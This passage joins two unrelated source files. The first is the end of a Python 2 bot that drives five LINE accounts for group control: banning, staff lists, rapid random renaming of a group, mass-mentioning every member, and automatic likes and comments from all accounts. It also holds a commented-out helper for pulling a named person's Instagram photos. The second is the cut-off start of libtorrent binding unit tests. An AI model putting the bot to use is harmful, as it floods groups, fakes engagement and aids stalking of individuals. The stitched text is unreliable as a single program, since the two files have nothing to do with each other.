targets.append(g.mid)
if targets == []:
ki.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
del wait["blacklist"][target]
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Added to Whitelist")
except:
ki.sendText(msg.to,"Added to Whitelist")
else:
cl.sendText(msg.to,"Command denied.")
cl.sendText(msg.to,"Admin permission required.")
elif "Ar ban @" in msg.text:
if msg.toType == 2:
if msg.from_ in admin:
print "[Command]Ban executed"
_name = msg.text.replace("Ar ban @","")
_nametarget = _name.rstrip(' ')
gs = ki.getGroup(msg.to)
gs = kk.getGroup(msg.to)
gs = kc.getGroup(msg.to)
gs = kg.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Added to Blacklist")
except:
ki.sendText(msg.to,"Error")
else:
cl.sendText(msg.to,"Command denied.")
cl.sendText(msg.to,"Admin permission required.")
elif "Ar unban @" in msg.text:
if msg.toType == 2:
if msg.from_ in admin:
print "[Command]Unban executed"
_name = msg.text.replace("Ar unban @","")
_nametarget = _name.rstrip(' ')
gs = ki.getGroup(msg.to)
gs = kk.getGroup(msg.to)
gs = kc.getGroup(msg.to)
gs = kg.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
del wait["blacklist"][target]
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Added to Whitelist")
except:
ki.sendText(msg.to,"Added to Whitelist")
else:
cl.sendText(msg.to,"Command denied.")
cl.sendText(msg.to,"Admin permission required.")
elif msg.text in ["Ar Ban","Ar ban"]:
if msg.from_ in admin:
wait["wblacklist"] = True
cl.sendText(msg.to,"Send Contact to Ban")
print "[Command]Ban executed"
else:
cl.sendText(msg.to,"Command denied.")
cl.sendText(msg.to,"Admin permission required.")
print "[Error]Command denied - Admin permission required"
elif msg.text in ["Ar Unban","Ar unban"]:
if msg.from_ in admin:
wait["dblacklist"] = True
cl.sendText(msg.to,"Send Contact to Unban")
print "[Command]Unban executed"
else:
cl.sendText(msg.to,"Command denied.")
cl.sendText(msg.to,"Admin permission required.")
print "[Error]Command denied - Admin permission required"
elif msg.text in ["Ar Banlist","Ar banlist"]:
if wait["blacklist"] == {}:
cl.sendText(msg.to,"No user is Blacklisted")
else:
cl.sendText(msg.to,"Blacklisted user(s)")
mc = ""
for mi_d in wait["blacklist"]:
mc += "->" +cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
print "[Command]Banlist executed"
#-----------------------[Bot Speak Section]------------------------
elif "Ar Bc " in msg.text:
if msg.from_ in staff:
bctxt = msg.text.replace("Ar Bc ","")
random.choice(KAC).sendText(msg.to,(bctxt))
print "[Command]Bc executed"
else:
cl.sendText(msg.to,"Command denied.")
cl.sendText(msg.to,"Staff or higher permission required.")
print "[Error]Command denied - staff or higher permission required"
elif "Ar bc " in msg.text:
if msg.from_ in staff:
bctxt = msg.text.replace("Ar bc ","")
cl.sendText(msg.to,(bctxt))
print "[Command]Bc executed"
else:
cl.sendText(msg.to,"Command denied.")
cl.sendText(msg.to,"Staff or higher permission required.")
print "[Error]Command denied - staff or higher permission required"
#-----------------------[Bot speed test Section]------------------------
elif msg.text in ["Ar Sp all","Ar Speed all","Ar sp all","Ar speed all"]:
if msg.from_ in staff:
start = time.time()
cl.sendText(msg.to, "Bot 1 Processing Request")
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sseconds" % (elapsed_time))
start2 = time.time()
kk.sendText(msg.to, "Bot 2 Processing Request")
elapsed_time2 = time.time() - start2
kk.sendText(msg.to, "%sseconds" % (elapsed_time2))
start3 = time.time()
ki.sendText(msg.to, "Bot 3 Processing Request")
elapsed_time3 = time.time() - start3
ki.sendText(msg.to, "%sseconds" % (elapsed_time3))
start4 = time.time()
kc.sendText(msg.to, "Bot 4 Processing Request")
elapsed_time4 = time.time() - start4
kc.sendText(msg.to, "%sseconds" % (elapsed_time4))
start5 = time.time()
kg.sendText(msg.to, "Bot 5 Processing Request")
elapsed_time5 = time.time() - start5
kg.sendText(msg.to, "%sseconds" % (elapsed_time5))
print "[Command]Speed all executed"
else:
cl.sendText(msg.to,"Command denied.")
cl.sendText(msg.to,"Staff or higher permission required.")
print "[Error]Command denied - staff or higher permission required"
elif msg.text in ["Ar Sp 1","Ar Speed 1","Ar sp 1","Ar speed 1"]:
if msg.from_ in staff:
start = time.time()
cl.sendText(msg.to, "Progress...")
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sseconds" % (elapsed_time))
print "[Command]Speed 1 executed"
else:
cl.sendText(msg.to,"Command denied.")
cl.sendText(msg.to,"Staff or higher permission required.")
print "[Error]Command denied - staff or higher permission required"
elif msg.text in ["Ar Sp 2","Ar Speed 2","Ar sp 2","Ar speed 2"]:
if msg.from_ in staff:
start = time.time()
kk.sendText(msg.to, "Progress...")
elapsed_time = time.time() - start
kk.sendText(msg.to, "%sseconds" % (elapsed_time))
print "[Command]Speed 2 executed"
else:
kk.sendText(msg.to,"Command denied.")
kk.sendText(msg.to,"Staff or higher permission required.")
print "[Error]Command denied - staff or higher permission required"
elif msg.text in ["Ar Sp 3","Ar Speed 3","Ar sp 3","Ar speed 3"]:
if msg.from_ in staff:
start = time.time()
ki.sendText(msg.to, "Progress...")
elapsed_time = time.time() - start
ki.sendText(msg.to, "%sseconds" % (elapsed_time))
print "[Command]Speed 3 executed"
else:
ki.sendText(msg.to,"Command denied.")
ki.sendText(msg.to,"Staff or higher permission required.")
print "[Error]Command denied - staff or higher permission required"
elif msg.text in ["Ar Sp 4","Ar Speed 4","Ar sp 4","Ar speed 4"]:
if msg.from_ in staff:
start = time.time()
kc.sendText(msg.to, "Progress...")
elapsed_time = time.time() - start
kc.sendText(msg.to, "%sseconds" % (elapsed_time))
print "[Command]Speed 4 executed"
else:
kc.sendText(msg.to,"Command denied.")
kc.sendText(msg.to,"Staff or higher permission required.")
print "[Error]Command denied - staff or higher permission required"
elif msg.text in ["Ar Sp 5","Ar Speed 5","Ar sp 5","Ar speed 5"]:
if msg.from_ in staff:
start = time.time()
kg.sendText(msg.to, "Progress...")
elapsed_time = time.time() - start
kg.sendText(msg.to, "%sseconds" % (elapsed_time))
print "[Command]Speed 5 executed"
else:
kc.sendText(msg.to,"Command denied.")
kc.sendText(msg.to,"Staff or higher permission required.")
print "[Error]Command denied - staff or higher permission required"
#-----------------------[Auto Cancel Section]------------------------
elif "Ar staff add @" in msg.text:
if msg.from_ in admin:
print "[Command]Staff add executing"
_name = msg.text.replace("Ar staff add @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
gs = ki.getGroup(msg.to)
gs = kk.getGroup(msg.to)
gs = kc.getGroup(msg.to)
gs = kg.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
staff.append(target)
cl.sendText(msg.to,"Added to the staff list")
except:
pass
print "[Command]Staff add executed"
else:
cl.sendText(msg.to,"Command denied.")
cl.sendText(msg.to,"Admin permission required.")
elif "Ar Staff add @" in msg.text:
if msg.from_ in admin:
print "[Command]Staff add executing"
_name = msg.text.replace("Ar Staff add @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
gs = ki.getGroup(msg.to)
gs = kk.getGroup(msg.to)
gs = kc.getGroup(msg.to)
gs = kg.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
staff.append(target)
cl.sendText(msg.to,"Added to the staff list")
except:
pass
print "[Command]Staff add executed"
else:
cl.sendText(msg.to,"Command denied.")
cl.sendText(msg.to,"Admin permission required.")
elif "Ar staff remove @" in msg.text:
if msg.from_ in admin:
print "[Command]Staff remove executing"
_name = msg.text.replace("Ar staff remove @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
gs = ki.getGroup(msg.to)
gs = kk.getGroup(msg.to)
gs = kc.getGroup(msg.to)
gs = kg.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
staff.remove(target)
cl.sendText(msg.to,"Removed to the staff list")
except:
pass
print "[Command]Staff remove executed"
else:
cl.sendText(msg.to,"Command denied.")
cl.sendText(msg.to,"Admin permission required.")
elif "Ar Staff remove @" in msg.text:
if msg.from_ in admin:
print "[Command]Staff remove executing"
_name = msg.text.replace("Ar Staff remove @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
gs = ki.getGroup(msg.to)
gs = kk.getGroup(msg.to)
gs = kc.getGroup(msg.to)
gs = kg.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
staff.remove(target)
cl.sendText(msg.to,"Removed to the staff list")
except:
pass
print "[Command]Staff remove executed"
else:
cl.sendText(msg.to,"Command denied.")
cl.sendText(msg.to,"Admin permission required.")
elif msg.text in ["Ar Stafflist","Ar stafflist"]:
if staff == []:
cl.sendText(msg.to,"The stafflist is empty")
else:
cl.sendText(msg.to,"Staff list:")
mc = ""
for mi_d in staff:
mc += "->" +cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
print "[Command]Stafflist executed"
#-----------------------[Auto cancel Section]------------------------
elif msg.text in ["Ar Cancel off","Ar cancel off"]:
if msg.from_ in staff:
if cancelinvite["autoCancel"] == True:
cancelinvite["autoCancel"] = False
cl.sendText(msg.to, "Auto Cancel turned off")
print "[Command]Cancel off executed"
else:
cl.sendText(msg.to, "Auto Cancel already turned off")
print "[Command]Cancel off executed"
else:
cl.sendText(msg.to,"Command denied.")
cl.sendText(msg.to,"Staff or higher permission required.")
print "[Error]Command denied - staff or higher permission required"
elif msg.text in ["Ar Cancel on","Ar cancel on"]:
if msg.from_ in staff:
if cancelinvite["autoCancel"] == False:
cancelinvite["autoCancel"] = True
cl.sendText(msg.to, "Auto Cancel turned on")
print "[Command]Cancel on executed"
else:
cl.sendText(msg.to, "Auto Cancel already turned on")
print "[Command]Cancel on executed"
else:
cl.sendText(msg.to,"Command denied.")
cl.sendText(msg.to,"Staff or higher permission required.")
print "[Error]Command denied - staff or higher permission required"
elif msg.text in ["Ar Url off","Ar url off"]:
if msg.from_ in staff:
if cancelinvite["autoCancelUrl"] == True:
cancelinvite["autoCancelUrl"] = False
cl.sendText(msg.to, "Auto Cancel Url turned off")
print "[Command]Url off executed"
else:
cl.sendText(msg.to, "Auto Cancel already turned off")
print "[Command]Url off executed"
else:
cl.sendText(msg.to,"Command denied.")
cl.sendText(msg.to,"Staff or higher permission required.")
print "[Error]Command denied - staff or higher permission required"
elif msg.text in ["Ar Url on","Ar url on"]:
if msg.from_ in staff:
if cancelinvite["autoCancelUrl"] == True:
cancelinvite["autoCancelUrl"] = False
cl.sendText(msg.to, "Auto Cancel Url turned off")
print "[Command]Url on executed"
else:
cl.sendText(msg.to, "Auto Cancel already turned off")
print "[Command]Url on executed"
else:
cl.sendText(msg.to,"Command denied.")
cl.sendText(msg.to,"Staff or higher permission required.")
print "[Error]Command denied - staff or higher permission required"
#-----------------------[Misc Section]-------------------------------------------
elif "Ar random:" in msg.text:
if msg.toType == 2:
if msg.from_ in staff:
strnum = msg.text.replace("Ar random:","")
source_str = 'abcdefghijklmnopqrstuvwxyz1234567890@:;./_][!&%$#)(=~^|'
try:
num = int(strnum)
group = cl.getGroup(msg.to)
for var in range(0,num):
name = "".join([random.choice(source_str) for x in xrange(10)])
time.sleep(0.05)
group.name = name
random.choice(KAC).updateGroup(group)
except:
cl.sendText(msg.to,"Error")
print "[Command]Random executed"
else:
cl.sendText(msg.to,"Command denied.")
cl.sendText(msg.to,"Staff or higher permission required.")
print "[Error]Command denied - staff or higher permission required"
elif "Ar Random:" in msg.text:
if msg.toType == 2:
if msg.from_ in staff:
strnum = msg.text.replace("Ar Random:","")
source_str = 'abcdefghijklmnopqrstuvwxyz1234567890@:;./_][!&%$#)(=~^|'
try:
num = int(strnum)
group = cl.getGroup(msg.to)
for var in range(0,num):
name = "".join([random.choice(source_str) for x in xrange(10)])
time.sleep(0.01)
group.name = name
cl.updateGroup(group)
except:
cl.sendText(msg.to,"Error")
print "[Command]Random executed"
else:
cl.sendText(msg.to,"Command denied.")
cl.sendText(msg.to,"Staff or higher permission required.")
print "[Error]Command denied - staff or higher permission required"
elif msg.text in ["Ar Absen","Ar absen"]:
if msg.from_ in staff:
cl.sendText(msg.to, "Hadir")
kk.sendText(msg.to, "Hadir")
ki.sendText(msg.to, "Hadir")
kc.sendText(msg.to, "Hadir")
kg.sendText(msg.to, "Hadir")
print "[Command]Absen executed"
else:
cl.sendText(msg.to,"Command denied.")
cl.sendText(msg.to,"Staff or higher permission required.")
print "[Error]Command denied - staff or higher permission required"
elif msg.text in ["Ar Kernel","Ar kernel"]:
if msg.from_ in admin:
botKernel = subprocess.Popen(["uname","-svmo"], stdout=subprocess.PIPE).communicate()[0]
cl.sendText(msg.to, botKernel)
print "[Command]Kernel executed"
else:
cl.sendText(msg.to,"Command denied.")
cl.sendText(msg.to,"Admin permission required.")
print "[Error]Command denied - Admin permission required"
# elif "Ar Stalk " in msg.text:
# print "[Command]Stalk executing"
# stalkID = msg.text.replace("Ar Stalk ","")
# subprocess.call(["instaLooter",stalkID,"tmp/","-n","1"])
# files = glob.glob("tmp/*.jpg")
# for file in files:
# os.rename(file,"tmp/tmp.jpg")
# fileTmp = glob.glob("tmp/tmp.jpg")
# if not fileTmp:
# cl.sendText(msg.to, "Image not found, maybe the account haven't post a single picture or the account is private")
# print "[Command]Stalk executed - no image found"
# else:
# image = upload_tempimage(client)
# cl.sendText(msg.to, format(image['link']))
# print "[Command]Stalk executed - success"
# elif "Ar stalk " in msg.text:
# print "[Command]Stalk executing"
# stalkID = msg.text.replace("Ar stalk ","")
# subprocess.call(["instaLooter",stalkID,"tmp/","-n","1"])
# files = glob.glob("tmp/*.jpg")
# for file in files:
# os.rename(file,"tmp/tmp.jpg")
# fileTmp = glob.glob("tmp/tmp.jpg")
# if not fileTmp:
# cl.sendText(msg.to, "Image not found, maybe the account haven't post a single picture or the account is private")
# print "[Command]Stalk executed - no image found"
# else:
# image = upload_tempimage(client)
# cl.sendText(msg.to, format(image['link']))
# subprocess.call(["sudo","rm","-rf","tmp/tmp.jpg"])
# print "[Command]Stalk executed - success"
elif "Ar Add @" in msg.text:
if msg.toType == 2:
if msg.from_ in admin:
print "[Command]Add executing"
_name = msg.text.replace("Ar Add @","")
_nametarget = _name.rstrip(' ')
gs = ki.getGroup(msg.to)
gs = kk.getGroup(msg.to)
gs = kc.getGroup(msg.to)
gs = kg.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
cl.findAndAddContactsByMid(target)
except:
ki.sendText(msg.to,"Error")
else:
cl.sendText(msg.to,"Command denied.")
cl.sendText(msg.to,"Admin permission required.")
elif "Ar add @" in msg.text:
if msg.toType == 2:
if msg.from_ in admin:
print "[Command]Add executed"
_name = msg.text.replace("Ar Add @","")
_nametarget = _name.rstrip(' ')
gs = ki.getGroup(msg.to)
gs = kk.getGroup(msg.to)
gs = kc.getGroup(msg.to)
gs = kg.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki.sendText(msg.to,"Contact not found")
else:
for target in targets:
cl.findAndAddContactsByMid(target)
ki.findAndAddContactsByMid(target)
kk.findAndAddContactsByMid(target)
kc.findAndAddContactsByMid(target)
kg.findAndAddContactsByMid(target)
else:
cl.sendText(msg.to,"Command denied.")
cl.sendText(msg.to,"Admin permission required.")
elif msg.text in ["Ar Like", "Ar like"]:
if msg.from_ in staff:
print "[Command]Like executed"
cl.sendText(msg.to,"Trying to Like post(s) from staff")
try:
likePost()
except:
pass
elif msg.text in ["Ar Tagall", "Ar tagall"]:
group = cl.getGroup(msg.to)
msg_appended = ""
mem = [contact.mid for contact in group.members]
for mm in mem:
xname = cl.getContact(mm).displayName
xlen = str(len(xname)+1)
msg.contentType = 0
msg.text = "@"+xname+" "
msg.contentMetadata ={'MENTION':'{"MENTIONEES":[{"S":"0","E":'+json.dumps(xlen)+',"M":'+json.dumps(mm)+'}]}','EMTVER':'4'}
# msg_appended += "->" +msg+ "\n"
try:
cl.sendMessage(msg)
except Exception as error:
print error
else:
if cl.getGroup(msg.to).preventJoinByTicket == False:
cl.reissueGroupTicket(msg.to)
X = cl.getGroup(msg.to)
X.preventJoinByTicket = True
random.choice(KAC).updateGroup(X)
else:
if msg.from_ in Bots:
pass
else:
print "No Action"
if op.type == 59:
print op
except Exception as error:
print error
# def nameUpdate_Bot1():
# while True:
# try:
# profile = cl.getProfile()
# profile.displayName = bot1_name["1"]
# cl.updateProfile(profile)
# time.sleep(0.5)
# profile = cl.getProfile()
# profile.displayName = bot1_name["2"]
# cl.updateProfile(profile)
# time.sleep(0.5)
# profile = cl.getProfile()
# profile.displayName = bot1_name["3"]
# cl.updateProfile(profile)
# time.sleep(0.5)
# profile = cl.getProfile()
# profile.displayName = bot1_name["4"]
# cl.updateProfile(profile)
# time.sleep(0.5)
# profile = cl.getProfile()
# profile.displayName = bot1_name["5"]
# cl.updateProfile(profile)
# time.sleep(0.5)
# profile = cl.getProfile()
# profile.displayName = bot1_name["6"]
# cl.updateProfile(profile)
# time.sleep(0.5)
# profile = cl.getProfile()
# profile.displayName = bot1_name["7"]
# cl.updateProfile(profile)
# time.sleep(0.5)
# profile = cl.getProfile()
# profile.displayName = bot1_name["8"]
# cl.updateProfile(profile)
# time.sleep(0.5)
# profile = cl.getProfile()
# profile.displayName = bot1_name["9"]
# cl.updateProfile(profile)
# time.sleep(0.5)
# profile = cl.getProfile()
# profile.displayName = bot1_name["10"]
# cl.updateProfile(profile)
# time.sleep(0.5)
# profile = cl.getProfile()
# profile.displayName = bot1_name["11"]
# cl.updateProfile(profile)
# time.sleep(0.5)
# except:
# pass
# def nameUpdate_Bot2():
# while True:
# try:
# profile = kk.getProfile()
# profile.displayName = bot2_name["1"]
# kk.updateProfile(profile)
# time.sleep(0.5)
# profile = kk.getProfile()
# profile.displayName = bot2_name["2"]
# kk.updateProfile(profile)
# time.sleep(0.5)
# profile = kk.getProfile()
# profile.displayName = bot2_name["3"]
# kk.updateProfile(profile)
# time.sleep(0.5)
# profile = kk.getProfile()
# profile.displayName = bot2_name["4"]
# kk.updateProfile(profile)
# time.sleep(0.5)
# profile = kk.getProfile()
# profile.displayName = bot2_name["5"]
# kk.updateProfile(profile)
# time.sleep(0.5)
# profile = kk.getProfile()
# profile.displayName = bot2_name["6"]
# kk.updateProfile(profile)
# time.sleep(0.5)
# profile = kk.getProfile()
# profile.displayName = bot2_name["7"]
# kk.updateProfile(profile)
# time.sleep(0.5)
# profile = kk.getProfile()
# profile.displayName = bot2_name["8"]
# kk.updateProfile(profile)
# time.sleep(0.5)
# profile = kk.getProfile()
# profile.displayName = bot2_name["9"]
# kk.updateProfile(profile)
# time.sleep(0.5)
# profile = kk.getProfile()
# profile.displayName = bot2_name["10"]
# kk.updateProfile(profile)
# time.sleep(0.5)
# profile = kk.getProfile()
# profile.displayName = bot2_name["11"]
# kk.updateProfile(profile)
# time.sleep(0.5)
# except:
# pass
# def nameUpdate_Bot3():
# while True:
# try:
# profile = ki.getProfile()
# profile.displayName = bot3_name["1"]
# ki.updateProfile(profile)
# time.sleep(0.5)
# profile = ki.getProfile()
# profile.displayName = bot3_name["2"]
# ki.updateProfile(profile)
# time.sleep(0.5)
# profile = ki.getProfile()
# profile.displayName = bot3_name["3"]
# ki.updateProfile(profile)
# time.sleep(0.5)
# profile = ki.getProfile()
# profile.displayName = bot3_name["4"]
# ki.updateProfile(profile)
# time.sleep(0.5)
# profile = ki.getProfile()
# profile.displayName = bot3_name["5"]
# ki.updateProfile(profile)
# time.sleep(0.5)
# profile = ki.getProfile()
# profile.displayName = bot3_name["6"]
# ki.updateProfile(profile)
# time.sleep(0.5)
# profile = ki.getProfile()
# profile.displayName = bot3_name["7"]
# ki.updateProfile(profile)
# time.sleep(0.5)
# profile = ki.getProfile()
# profile.displayName = bot3_name["8"]
# ki.updateProfile(profile)
# time.sleep(0.5)
# profile = ki.getProfile()
# profile.displayName = bot3_name["9"]
# ki.updateProfile(profile)
# time.sleep(0.5)
# profile = ki.getProfile()
# profile.displayName = bot3_name["10"]
# ki.updateProfile(profile)
# time.sleep(0.5)
# profile = ki.getProfile()
# profile.displayName = bot3_name["11"]
# ki.updateProfile(profile)
# time.sleep(0.5)
# except:
# pass
# def nameUpdate_Bot4():
# while True:
# try:
# profile = kc.getProfile()
# profile.displayName = bot4_name["1"]
# kc.updateProfile(profile)
# time.sleep(0.5)
# profile = kc.getProfile()
# profile.displayName = bot4_name["2"]
# kc.updateProfile(profile)
# time.sleep(0.5)
# profile = kc.getProfile()
# profile.displayName = bot4_name["3"]
# kc.updateProfile(profile)
# time.sleep(0.5)
# profile = kc.getProfile()
# profile.displayName = bot4_name["4"]
# kc.updateProfile(profile)
# time.sleep(0.5)
# profile = kc.getProfile()
# profile.displayName = bot4_name["5"]
# kc.updateProfile(profile)
# time.sleep(0.5)
# profile = kc.getProfile()
# profile.displayName = bot4_name["6"]
# kc.updateProfile(profile)
# time.sleep(0.5)
# profile = kc.getProfile()
# profile.displayName = bot4_name["7"]
# kc.updateProfile(profile)
# time.sleep(0.5)
# profile = kc.getProfile()
# profile.displayName = bot4_name["8"]
# kc.updateProfile(profile)
# time.sleep(0.5)
# profile = kc.getProfile()
# profile.displayName = bot4_name["9"]
# kc.updateProfile(profile)
# time.sleep(0.5)
# profile = kc.getProfile()
# profile.displayName = bot4_name["10"]
# kc.updateProfile(profile)
# time.sleep(0.5)
# profile = kc.getProfile()
# profile.displayName = bot4_name["11"]
# kc.updateProfile(profile)
# time.sleep(0.5)
# except:
# pass
# def nameUpdate_Bot5():
# while True:
# try:
# profile = kg.getProfile()
# profile.displayName = bot5_name["1"]
# kg.updateProfile(profile)
# time.sleep(0.5)
# profile = kg.getProfile()
# profile.displayName = bot5_name["2"]
# kg.updateProfile(profile)
# time.sleep(0.5)
# profile = kg.getProfile()
# profile.displayName = bot5_name["3"]
# kg.updateProfile(profile)
# time.sleep(0.5)
# profile = kg.getProfile()
# profile.displayName = bot5_name["4"]
# kg.updateProfile(profile)
# time.sleep(0.5)
# profile = kg.getProfile()
# profile.displayName = bot5_name["5"]
# kg.updateProfile(profile)
# time.sleep(0.5)
# profile = kg.getProfile()
# profile.displayName = bot5_name["6"]
# kg.updateProfile(profile)
# time.sleep(0.5)
# profile = kg.getProfile()
# profile.displayName = bot5_name["7"]
# kg.updateProfile(profile)
# time.sleep(0.5)
# profile = kg.getProfile()
# profile.displayName = bot5_name["8"]
# kg.updateProfile(profile)
# time.sleep(0.5)
# profile = kg.getProfile()
# profile.displayName = bot5_name["9"]
# kg.updateProfile(profile)
# time.sleep(0.5)
# profile = kg.getProfile()
# profile.displayName = bot5_name["10"]
# kg.updateProfile(profile)
# time.sleep(0.5)
# profile = kg.getProfile()
# profile.displayName = bot5_name["11"]
# kg.updateProfile(profile)
# time.sleep(0.5)
# except:
# pass
# def nameUpdate():
# while True:
# try:
# #while a2():
# #pass
# if wait["clock"] == True:
# now2 = datetime.now()
# nowT = datetime.strftime(now2,"(%H:%M)")
# profile = cl.getProfile()
# profile.displayName = wait["cName"]
# cl.updateProfile(profile)
# profile2 = kk.getProfile()
# profile2.displayName = wait["cName2"]
# kk.updateProfile(profile2)
# profile3 = ki.getProfile()
# profile3.displayName = wait["cName3"]
# ki.updateProfile(profile3)
# profile4 = kc.getProfile()
# profile4.displayName = wait["cName4"]
# kc.updateProfile(profile4)
# profile5 = kg.getProfile()
# profile5.displayName = wait["cName5"]
# kg.updateProfile(profile5)
# time.sleep(600)
# except:
# pass
# thread2 = threading.Thread(target=nameUpdate)
# thread2.daemon = True
# thread2.start()
def likePost():
for zx in range(0,20):
hasil = cl.activity(limit=20)
if hasil['result']['posts'][zx]['postInfo']['liked'] == False:
if hasil['result']['posts'][zx]['userInfo']['mid'] in staff:
try:
cl.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
kk.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
ki.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
kc.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
kg.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
cl.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"Auto like by ARDH-")
print "Like"
except:
pass
else:
print "Not Admin or staff"
# Auto Changing name
# thread1 = threading.Thread(target=nameUpdate_Bot1)
# thread1.daemon = True
# thread1.start()
# thread2 = threading.Thread(target=nameUpdate_Bot2)
# thread2.daemon = True
# thread2.start()
# thread3 = threading.Thread(target=nameUpdate_Bot3)
# thread3.daemon = True
# thread3.start()
# thread4 = threading.Thread(target=nameUpdate_Bot4)
# thread4.daemon = True
# thread4.start()
# thread5 = threading.Thread(target=nameUpdate_Bot5)
# thread5.daemon = True
# thread5.start()
# END
while True:
try:
Ops = cl.fetchOps(cl.Poll.rev, 5)
except EOFError:
raise Exception("It might be wrong revision\n" + str(cl.Poll.rev))
for Op in Ops:
if (Op.type != OpType.END_OF_OPERATION):
cl.Poll.rev = max(cl.Poll.rev, Op.revision)
bot(Op)
|
test.py
|
#!/usr/bin/env python3
# vim: tabstop=8 expandtab shiftwidth=4 softtabstop=4
import libtorrent as lt
import unittest
import time
import datetime
import os
import shutil
import binascii
import subprocess as sub
import sys
import pickle
import threading
import tempfile
import socket
import select
import logging
import ssl
import http.server
import functools
import dummy_data
# include terminal interface for travis parallel executions of scripts which use
# terminal features: fix multiple stdin assignment at termios.tcgetattr
if os.name != 'nt':
import pty
settings = {
'alert_mask': lt.alert.category_t.all_categories,
'enable_dht': False, 'enable_lsd': False, 'enable_natpmp': False,
'enable_upnp': False, 'listen_interfaces': '0.0.0.0:0', 'file_pool_size': 1}
def has_deprecated():
return hasattr(lt, 'version')
class test_create_torrent(unittest.TestCase):
def test_from_torrent_info(self):
ti = lt.torrent_info('unordered.torrent')
print(ti.ssl_cert())
ct = lt.create_torrent(ti)
entry = ct.generate()
content = lt.bencode(entry).strip()
with open('unordered.torrent', 'rb') as f:
file_content = bytearray(f.read().strip())
print(content)
print(file_content)
print(entry)
self.assertEqual(content, file_content)
def test_from_scratch(self):
fs = lt.file_storage()
fs.add_file('test/file1', 1000)
fs.add_file('test/file2', 2000)
self.assertEqual(fs.file_name(0), 'file1')
self.assertEqual(fs.file_name(1), 'file2')
ct = lt.create_torrent(fs)
ct.add_url_seed('foo')
ct.add_http_seed('bar')
ct.add_tracker('bar')
ct.set_root_cert('1234567890')
ct.add_collection('1337')
entry = ct.generate()
encoded = lt.bencode(entry)
print(encoded)
# zero out the creation date:
encoded = encoded.split(b'13:creation datei', 1)
encoded[1] = b'0e' + encoded[1].split(b'e', 1)[1]
encoded = b'13:creation datei'.join(encoded)
self.assertEqual(encoded, b'd8:announce3:bar13:creation datei0e9:httpseeds3:bar4:infod11:collectionsl4:1337e5:filesld6:lengthi2000e4:pathl5:file2eed6:lengthi1000e4:pathl5:file1eee4:name4:test12:piece lengthi16384e6:pieces20:\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x008:ssl-cert10:1234567890e8:url-list3:fooe')
class test_session_stats(unittest.TestCase):
def test_add_torrent_params(self):
atp = lt.add_torrent_params()
for field_name in dir(atp):
field = getattr(atp, field_name)
print(field_name, field)
atp.renamed_files = {}
atp.merkle_tree = []
atp.unfinished_pieces = {}
atp.have_pieces = []
atp.banned_peers = []
atp.verified_pieces = []
atp.piece_priorities = []
atp.url_seeds = []
def test_unique(self):
metrics = lt.session_stats_metrics()
self.assertTrue(len(metrics) > 40)
idx = set()
for m in metrics:
self.assertTrue(m.value_index not in idx)
idx.add(m.value_index)
def test_find_idx(self):
self.assertEqual(lt.find_metric_idx("peer.error_peers"), 0)
class test_torrent_handle(unittest.TestCase):
def setup(self):
self.ses = lt.session(settings)
self.ti = lt.torrent_info('url_seed_multi.torrent')
self.h = self.ses.add_torrent({
'ti': self.ti, 'save_path': os.getcwd(),
'flags': lt.torrent_flags.default_flags})
def test_add_torrent_error(self):
self.ses = lt.session(settings)
self.ti = lt.torrent_info('url_seed_multi.torrent')
with self.assertRaises(RuntimeError):
self.ses.add_torrent({'ti': self.ti, 'save_path': os.getcwd(), 'info_hash': b'abababababababababab'})
def test_move_storage(self):
self.setup()
